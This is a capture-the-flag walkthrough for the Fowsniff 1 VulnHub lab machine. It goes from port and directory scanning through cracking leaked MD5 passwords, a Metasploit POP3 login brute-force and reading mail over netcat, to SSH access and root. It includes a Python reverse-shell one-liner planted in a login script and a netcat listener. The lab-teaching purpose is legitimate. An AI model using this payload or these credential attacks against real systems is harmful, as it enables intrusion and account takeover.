Fowsniff: 1 Vulnhub Walkthrough

Description

Hello, today I will write the steps of my first vulnhub machine. There is only one weak machine in the Fowsniff series. If you want to download the vulnerable machine, you can click here. In this article, we will see the solution to the Fowsniff machine.

Writeup

We have opened the machine with VirtualBox Then enter our command to learn the IP address of the weak machine.

netdiscover
netdiscover

We learned the IP address of the weak machine. Now the secondary situation we have to do is scan the open ports. For this, we will use the Nmap tool.

nmap -sV 192.168.1.3
nmap

We see that port 80 is open but there is nothing on the site. To get more information, we need to scan a file extension. If we talk about the options in the code, we enter the target’s IP address with -u, then we select the location of our word file with -w and the file extension with -x.

gobuster dir -u http://192.168.1.3 -w /usr/share/dirb/wordlists/common.txt -t 200 -x php,html,txt
gobuster

When we review our Gobuster scan results, the /security.txt extension gets our attention. Now it will be time to enter this extension. For this, it will be to add the extension to the end of the machine’s IP address.

security

This is how we see a page like this, “Fowsniff Corp got pwn3d by B1gN1nj4!” When we search the text on Google, we can see many usernames and passwords on a Pastebin site.

pastebin

When we examine the passwords, we see that they are MD5. We need to crack these MD5 texts and get a password, then we will try the passwords and enter the system. We take the help of a website for this and turn MD5 texts into passwords we want to see quickly and easily. For this site click here.

hashkiller md5

We will save usernames and passwords we find in one file.

pass id

After registering usernames and passwords, we run our Metasploit tool. We will enter the commands in the code block below into the Metasploit tool, respectively. In this way, we will have tried the usernames and passwords we received.

Metasploit

In the port scan we do with Nmap, you will remember that the 110 pop3 port is open, now we will try these ids and passes there because the number is low, it can be tried manually, but I suggest doing it with Metasploit for practice.

msfconsole
use auxiliary/scanner/pop3/pop3_login
set RHOSTS 192.168.1.3
set user_file id.txt
set pass_file pass.txt
run
msfconsole metasploit

After waiting a few minutes according to the processor speed of your computer, our vehicle finds the correct match.

metasploit find

We will make a connection with the Ncat tool. We will write a Metasploit matching username and password.

nc 192.168.1.3 110
user seina
pass scoobydoo2
list
nc ncat

We used the list command in the above image. Thanks to this command, we have displayed whether we have any messages after logging in. According to the result, we see that we have two messages. We will enter the command below to view the message.

retr 1
retr 2

You can magnify two relevant screenshots in the new tab. When we examine the messages in the screenshots, in message 1 The temporary password for SSH is “S1ck3nBluff + secureshell” tells us that this protocol is an SSH. In message 2, we learn from whom the message was sent. In line with this information we received, our next move will be to provide an SSH connection.

ssh [email protected]
Password : S1ck3nBluff+secureshell
ssh connection

We have successfully connected with ssh. Now we will search for the file with the Cube and Fowsniff text that appears at the opening and try the reverse shell.

find / -group users -type f 2>/dev/null
find / -group users -type f 2>/dev/null
Reverse Shell

Open the file we find with vim then we enter the command in the code line. The point to be noted is that you need to change the IP address and port number in the command. We save and exit the vim editor.

vim cube.sh

python3 -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);   os.dup2(s.fileno(),1);   os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
vim reverse shell

We will start listening with Ncat to complete Reverse Shell then we disconnect the ssh and log in again and since the cube sh file is run initially and the python shell that we added also works.

nc -lvnp 1234
ls
cd /root
cat flag.txt
nc -lnvp 1234 reverse shell

We successfully completed a vulnhub machine solution and displayed the flag.

flag capture the flag

Related Posts

Scroll to Top